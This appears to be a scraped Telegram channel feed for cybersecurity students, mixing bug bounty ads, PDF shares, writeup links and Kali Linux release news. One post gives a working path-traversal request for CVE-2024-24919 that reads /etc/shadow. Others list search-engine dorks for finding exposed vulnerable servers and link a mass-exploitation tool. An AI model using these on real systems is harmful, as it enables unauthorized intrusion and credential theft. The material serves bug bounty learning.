SecList for CyberStudents

🚨Ready to level up your cybersecurity skills and earn rewards?

📢Join our 30-day bug bounty challenge and learn the art of bug bounty hunting!

😉Over 30 days, you'll receive daily tasks to help you master:

Information gathering and reconnaissance
Vulnerability identification and exploitation
Web application security testing
API security testing
Cloud security testing
Fuzz testing
Machine learning and AI in security
Business logic vulnerabilities
Deserialization vulnerabilities
Server-side request forgery (SSRF)

👌Plus, you'll get access to resources and references to help you along the way!

📝Complete the challenge and earn a Certificate of Completion to showcase your skills!

💖Join the community and start your journey to cybersecurity mastery today!

🔗Join Now: https://nas.io/brutsecurity/challenges/bug-bounty-blitz-30-days-of-learning

🔥2

94 views19:34

SecList for CyberStudents

SQLiZine.pdf

8.6 MB

95 views19:47

SecList for CyberStudents

Как был найден RCE в одной из публичных программ на Bugcrowd

В статье описывается пошаговый процесс поиска RCE, начиная со сбора интересных активов и сканирования портов, и заканчивая тестированием различных эксплойтов и проверкой эндпоинтов. Автор также рассказывает о своих неудачах и успехах, приводя пример того, как настойчивость, упорство и немного удачи привели к успешному обнаружению серьезной уязвимости.

Ссылка на статью

#web #rce #struts

Telegraph

Как был найден RCE в одной из публичных программ на Bugcrowd

Всем привет, cегодня я расскажу, как получил RCE на одной из публичных программ Bugcrowd. Выбирая программу для взлома, я всегда обращаю внимание на программы с широким скоупом, так как они дают мне большую свободу для поиска активов, которые соответствуют…

82 views20:53

SecList for CyberStudents

ios-pentesting-beginners-practical-guide-pptx-269357958.pdf

369.3 KB

❤1

95 views06:16

SecList for CyberStudents

https://github.com/BaadMaro/CTF/tree/main/NahamCon%20CTF%202024/The%20Davinci%20Code

#CTF #Writeup

GitHub

CTF/NahamCon CTF 2024/The Davinci Code at main · BaadMaro/CTF

CTF Writeups. Contribute to BaadMaro/CTF development by creating an account on GitHub.

🔥2

77 views13:06

SecList for CyberStudents

https://blog.intigriti.com/2024/05/28/bug-bounty-calculator-crunch-the-numbers-and-optimize-your-vdp/

Intigriti

Bug Bounty Calculator: Crunch the numbers and optimize your program

Intigriti’s Bug Bounty Calculator is a free tool to help bug bounty program owners make an informed decision when setting their prices.

74 views09:01

SecList for CyberStudents

🚨CVE-2024-24919🚨

💥Shodan Dork: title:"Check Point" ssl:"target"

🤠POC:

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

🔥3

67 views21:19

SecList for CyberStudents

https://habr.com/ru/companies/otus/articles/816731/

#Android #Reversing

👍2

77 viewsedited 15:08

SecList for CyberStudents

🔥4🗿1

72 views15:34

SecList for CyberStudents

https://www.youtube.com/watch?v=9U7OFdri73g

YouTube

HackTheBox - Analysis

00:00 - Introduction
01:05 - Start of nmap
05:00 - Discovering the internal.analysis.htb subdomain
07:55 - Talking about why I want to run FeroxBuster here and showing the menu so we can stop crawling non-interesting directories (ex: js, css, img)
13:30 …

65 views11:48

SecList for CyberStudents

🚨CVE-2024-4956:Nexus Repository Flaw Exposed🚨

⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.

👉Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"

POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956

GitHub

vulhub/nexus/CVE-2024-4956 at master · vulhub/vulhub

Pre-Built Vulnerable Environments Based on Docker-Compose - vulhub/vulhub

67 views20:59

SecList for CyberStudents

CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

💥POC: https://lnkd.in/g_v4h7Cg

👉Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"

61 views05:29

SecList for CyberStudents

Mindmap. Pentesting active ‎directory.

• Вероятно, что это самая большая и актуальная Mindmap по пентесту active ‎directory на сегодняшний день. Можно подчеркнуть для себя огромное количество полезной информации и использовать как CheatSheet: https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg

#AD #Mindmap

64 views06:35

SecList for CyberStudents

#SQLi_Discovery #HTB

69 views11:15

SecList for CyberStudents

Hey hunters now try the Exploiter tool series of CVE-2024-4358 for mass exploitations: https://github.com/RevoltSecurities/CVE-2024-4358

GitHub

GitHub - RevoltSecurities/CVE-2024-4358: An Vulnerability detection and Exploitation tool for CVE-2024-4358

An Vulnerability detection and Exploitation tool for CVE-2024-4358 - RevoltSecurities/CVE-2024-4358

👍1

54 views11:58

SecList for CyberStudents

https://habr.com/ru/articles/802621/

#OSINT

👍1

57 views12:10

SecList for CyberStudents

Top RCE reports from HackerOne.pdf

367.3 KB

#Reports

👍1

96 views18:56

SecList for CyberStudents

Forwarded from Proxy Bar

This media is not supported in your browser

VIEW IN TELEGRAM

CVE-2024-5326 WordPress
*
Post Grid Gutenberg и плагин PostX = 4.1.2
User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.
*
POC exploit

#wordpress #exploit

👍1

54 views16:02

SecList for CyberStudents

https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md

#BugBounty

🔥2👍1

63 views20:12

SecList for CyberStudents

Forwarded from Kali Linux

⚡️

Вышла Kali Linux 2024.2 с 18 новыми инструментами и решением Проблемы 2038 года

Представлена новая версия Kali Linux 2024.2, в которую вошли сразу 18 новых инструментов, а также исправление для известной проблемы Y2038.

В новой версии пока не доступно ядро Linux 6.8, но оно ожидается в следующей версии (2024.3).

Зато релиз содержит 18 новых куртых инструментов:

* autorecon: многопоточный инструмент для сетевой разведки
* coercer: автоматическое принуждение Windows-сервера к аутентификации на произвольной машине
* dploot: переписанная на Python версия SharpDPAPI
* getsploit: утилита для поиска и загрузки эксплоитов
* gowitness: утилита для создания скриншотов с использованием Chrome Headless
* horst: оптимизированный инструмент для радиосканирования
* ligolo-ng: инструмент для туннелирования через интерфейс TUN
* mitm6: взлом IPv4 через IPv6
* netexec — инструмент для эксплуатации сетевых служб, который помогает автоматизировать оценку безопасности больших сетей;
* pspy — инструмент для мониторинга процессов Linux без root-прав;
* pyinstaller — преобразование (упаковка) Python-программ в самостоятельные исполняемые файлы;
* pyinstxtractor — экстрактор PyInstalller;
* sharpshooter — фреймворк для генерации полезных нагрузок;
* sickle — инструмент для разработки полезных нагрузок;
* snort — гибкая система для обнаружения сетевых вторжений;
* sploitscan — простой поиск информации о CVE;
* vopono — запуск приложений через VPN-туннели с временными сетевыми пространствами имен (namespace);
* waybackpy — API для Wayback Machine с помощью Python.

В данном релизе исправлена проблема Y2038. Она возникает на Linux-системах из-за 32-битного представления времени. Чтобы решить проблему, time_t был изменен на 64-битный на 32-битных архитектурах ARM, которые используются в основном в образах для Raspberry Pi и NetHunter.

В дополнение к новым инструментам и исправлениям, Kali 2024.2 включает:

* Gnome 46 с обновленными темами и расширениями
* Обновленный Xfce для повышения стабильности и производительности

@linuxkalii

Please open Telegram to view this post

VIEW IN TELEGRAM

👍1

51 views13:50

About

Blog

Apps

Platform